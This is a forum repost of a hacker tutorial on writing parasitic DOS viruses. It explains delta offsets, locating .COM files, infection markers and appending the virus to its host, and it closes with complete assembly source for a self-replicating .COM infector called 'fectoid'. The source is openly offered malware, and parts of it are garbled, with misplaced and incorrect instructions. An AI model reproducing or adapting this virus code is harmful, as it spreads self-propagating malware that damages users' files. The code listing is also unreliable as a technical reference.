Nytro Posted December 9, 2010 Report Posted December 9, 2010 Parasitic VirusesAuthor: z3romodel z3ro.the parasitic.com infectororg 100hpush disclaimerI (and the dmz/gny members/staff) take no responsibility for what you do with the knowledge gain from this article. This is for informational purposes only and i do not encourage criminal behavior. If you have a problem with me writing about this topic and think im am a criminal for doing so id like to point out Article 19 of Universal Declaration of Human Rights which states: "Everyone has the right to freedom of opinion and expression;this right includes freedom to hold opinions without interference and to seek, receive and impart information and ideas through any media and regardless of frontiers."Whats happening this time?1. Why asm is best for viruses2. What is a parasitic virus3. The delta offset and infection4.fectoid v 1.0;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;Call Asm_is_the_shitNow if you have ever seen the source for a virus you would have probably noticed that is in assembly(90% of the time). Now why would it be in asm? isn't asm uber hard? Well asm is a low level language as it deals directly with the cpu OS and memory very closely. This allows you things you couldn't do with C for example such as calculate a delta offset(more on this later).When using C it is possible to create a basic overwriting virus. But these are lame and probably wouldn't work in this day and age due to protected mode.ret;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;Call parasiticOk so what is a parasitic virus. It is quite different from an overwriting virus as it does not damage the host program. There are two main methods to doing this. We must first place a jump at the start of our host to our virus. WE must then calculate the offset to the end of the host and place our virus there. WE must also make sure that we do return control back to the host, or else we risk suspicion and errors. There are two main methods to writing a parasitic virus(DOS0 we could append to the front of the code or at the end. The front tends to be a little faster though it is much more complicated. Te second method is to append at the end and that is what we are going to cover here.retn;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;Call infectOk so you heard all the theory time for some code .When writing a parasitic virus you first need to calculate the delta offset. this is very easy to do but it is also a very important stepfirst: call nextnext:pop disub di,offset nextNow we have the offset that points to our code.Another very important part of a virus is the find mechanism. This is also very easy as all we have to do is use the 4ehfunction as interrupt 21h.masker db "*.com",0lea dx,[bp+offset masker]mov ah,4ehect...ok so we have found our unwilling host. But how do we know if we havent infected him already? We simply read the first few bytes and compare them to a string(which usually consists of a jmp to our code).mov ax,3d02hlea dx,[bp+offset dta+30]mov cx,3int 21hxchg ax,bxint 21hmov ax,word ptr [bp+dta+26]mov cx,word ptr [bp+ID+1]ID db "lalala",0And now the moment you have all been waiting for INFECTION!!!!Which is infact extremely simple. We first must set up the jmp to our code and then or id string then write them to the front of the host. WE do however have to use function 4200h which is straight forward.mov ah,40hmov cx,3lea dx,[bp+jmpz+ID]int 21hjmpz db 0e9h ; jmp to start of virus codeID db 20h,20h,0we then reset the file ptr and write the rest.mov ah,40hmov cx,eov-offset start_viruslea dx,[bp+offset start_virus]int 21hWe have jsut gone through the basic methods to a parasitic virus. WE have only discussed how to infect a .com file. In the next article we will cover DOs .EXEs and a little PE(i still cant infect them properly ) file infection.ret;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;push v1.0call fectoidAlright well i threw togeather some basic code togeather some code for this article. It IS VERY basic. It only covers what we have discussed in this article. Now it is very poorly done tbh but i feel its very easy to learn from. keep in mind i only spent about 20min working on it, but you can laugh if you want. Id also like to point out that none of these viruses will work on windoze. The techniques are similar but now you cant simply overwrite a file and get away with it. Learning how to do this is the first step. Sooner or later ill get into PE infetion which is MUCH MUCH more complicated. Anyways i hope you enjoy ill post a better version sometime soon, an infection checking system that actually works and better coding in general. Enjoy..model smallorg 100h.code.startupVic db "*.com",0dta db 42 dup (?)junk db 41h,41h,0leap db 0e9h,41h,0_fect db ?; here we set up offsets and the likestart:db 0e9hdw 0do:call nextnext:pop disub di,offset nextlea si,[bp+offset junk]mov di,100hpush dimovswmovsbmov _fect,5 ;up to 5 infections per run;set up dta to match our delta or else bad things will happen....lea dx,[bp+offset dta]call DTA_setfind_first:mov ah,4ehlea dx,[bp+offset vic]int 21hcall okfind_next:mov ah,4fhint 21hcall okjc quitjmp find_next; here we make sure the file is a .com file and check for previsious infectionsok:mov ax,3fhlea dx,[bp+offset dta+30]mov cx,3int 21hxchg ax,bxint 21hmov ax,word ptr [bp+dta+26]mov cx,word ptr [bp+junk+1]add cx,eov-do+3cmp ax,cxsub ax,3mov word ptr [bp+buff],axxor al,alcall file_mov ah,40hmov cx,3lea dx,[bp+leap]int 21hmov al,2call file_mov ah,40hmov cx,eov-dolea dx,[bp+do]int 21hclose:mov ah,3ehint 21hdec _fectcmp _fect,0jnz find_nextjmp hosthost:mov dx,80hint 21hmov di,100hjmp diquit: mov ax,4c00hint 21h; sets the dta duh...dta_set:mov ah,1ahint 21hretn; this sets up and returns our file pointerfile_:mov ah,42hxor cx,cxxor dx,dxint 21heov equ $buff dw ?END Quote
